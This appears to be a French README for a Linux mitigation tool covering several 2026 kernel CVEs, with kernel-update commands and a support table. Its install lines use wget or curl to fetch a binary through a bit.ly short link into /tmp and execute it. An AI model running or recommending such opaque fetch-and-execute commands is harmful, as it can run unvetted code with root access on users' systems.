Outil d'atténuation pour la vulnérabilité frag family
- Copy Fail (2026)
- Dirty Frag (2026)
- Fragnesia (2026)
- DirtyClone (2026)
- PEdit-CoW (2026)
Appliquer le correctif sur n'importe quel Linux
b="/tmp/cve_2026_frag_family_fix"; wget -qO $b $(wget -qO- https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4) && chmod +x $b && $b
ou
b="/tmp/cve_2026_frag_family_fix"; curl -fsSL "$(curl -fsSL https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4)" -o $b && chmod +x $b && $b
CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331
Description
- vérifie les modules activés liés à CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331
- propose une mise à jour du noyau si elle est disponible
- désactive
esp4, esp6, rxrpc, act_pedit sinon
- bloque le chargement des modules via
modprobe
- ajoute
module_blacklist à grub
- nettoie automatiquement le hotfix après la mise à jour du noyau
- pour les systèmes compatibles RHEL (AlmaLinux, Rocky, Oracle, Fedora), désactive Boot Loader Specification (GRUB_ENABLE_BLSCFG=false), définit GRUB_DEFAULT=0 et crée un hook d'installation du noyau (/etc/kernel/install.d/99-grub-update.install) qui met à jour la configuration grub après la mise à jour du noyau, afin que le noyau le plus récent soit chargé au prochain démarrage.
- pour les versions mineures, propose et effectue une mise à jour vers la dernière version mineure disposant d'une mise à jour du noyau
Description
- vérifie les modules activés pour la vulnérabilité CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331
- propose une mise à jour du noyau si disponible
- désactive
esp4, esp6, rxrpc, act_pedit sinon
- bloque le chargement des modules via
modprobe
- ajoute
module_blacklist à grub
- nettoie automatiquement le hotfix après la mise à jour du noyau
- pour les systèmes basés sur RHEL (AlmaLinux, Rocky, Oracle, Fedora), désactive Boot Loader Specification (GRUB_ENABLE_BLSCFG=false) et définit GRUB_DEFAULT=0, puis crée un hook d'installation du noyau (/etc/kernel/install.d/99-grub-update.install) qui régénère la configuration grub après les mises à jour du noyau afin de garantir que le noyau le plus récent se charge au prochain démarrage
- pour les versions mineures, il propose et effectue une mise à jour vers la dernière version mineure disposant d'une mise à jour du noyau disponible.
CVE-2026-31431 / Atténuation de Copy Fail (algif_aead)
Description
L'utilitaire vérifie la vulnérabilité CVE-2026-31431 (pre condition) et, si les privilèges root sont disponibles, applique l'atténuation :
- identifie les combinaisons protégées de systèmes d'exploitation (y compris WSL) et de versions du noyau
- propose une mise à jour du noyau avec correctif si elle est disponible
- désactive
algif_aead sinon
- bloque le chargement des modules via
modprobe
- ajoute
initcall_blacklist=algif_aead_init
- restreint
AF_ALG via systemd
Description
Cet outil détecte la vulnérabilité CVE-2026-31431 (pre condition) et applique l'atténuation (nécessite root) :
- identifie les combinaisons protégées de systèmes d'exploitation (y compris WSL) et de versions du noyau
- propose une mise à jour du noyau avec correctif si disponible
- désactive
algif_aead sinon
- bloque le chargement des modules via
modprobe
- ajoute
initcall_blacklist=algif_aead_init
- restreint
AF_ALG via systemd
Compilation Linux
docker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_frag_family_fix cve_2026_frag_family_fix.go && upx --best --ultra-brute cve_2026_frag_family_fix"
Mise à jour du noyau (pas un hotfix) disponible pour
| OS | Copy Fail (CVE-2026-31431) | Dirty Frag (CVE-2026-43500/43284) | Fragnesia (CVE-2026-46300) | PEdit-CoW (CVE-2026-46331) |
|---|
| Debian 10 (buster) | ❌ | ❌ | ❌ | ❌ |
| Debian 11 (bullseye) | ✅ | ✅ | ✅ | ✅ |
| Debian 12 (bookworm) | ✅ | ✅ | ✅ | ✅ |
| Debian 13 (trixie) | ✅ | ✅ | ✅ | ✅ |
| Ubuntu 18.04 (bionic) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 20.04 (focal) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 22.04 (jammy) | ✅ | ❌ | ❌ | ❌ |
| Ubuntu 24.04 (noble) | ✅ | ✅ | ✅ | ❌ |
| Ubuntu 25.04 (plucky) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 26.04 (resolute) | ✅ | ✅ | ✅ | ✅ |
| CentOS Stream 8 | ❌ | ❌ | ❌ | ❌ |
| CentOS Stream 9 | ✅ | ✅ | ✅ | ✅ |
| CentOS Stream 10 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 8 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 9 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 10 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 8 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 9 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 10 | ✅ | ✅ | ✅ | ✅ |
| Fedora 40 | ❌ | ❌ | ❌ | ❌ |
| Fedora 41 | ❌ | ❌ | ❌ | ❌ |
| Fedora 42 | ✅ | ✅ | ✅ | ✅ |
| Fedora 43 | ✅ | ✅ | ✅ | ✅ |
| Fedora 44 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 8 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 9 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 10 | ✅ | ✅ | ✅ | ✅ |
Commandes de mise à jour du noyau
- Debian
apt update && apt install linux-image-amd64 linux-headers-amd64 -y
- Ubuntu
apt update && apt install linux-image-generic linux-headers-generic -y
- CentOS
dnf clean metadata && dnf upgrade 'kernel*' -y
- AlmaLinux
dnf clean metadata && dnf upgrade 'kernel*' -y
- RockyLinux
dnf clean metadata && dnf upgrade 'kernel*' -y
- Fedora
dnf clean metadata && dnf upgrade 'kernel*' -y
- OracleLinux
dnf clean metadata && dnf upgrade 'kernel*' -y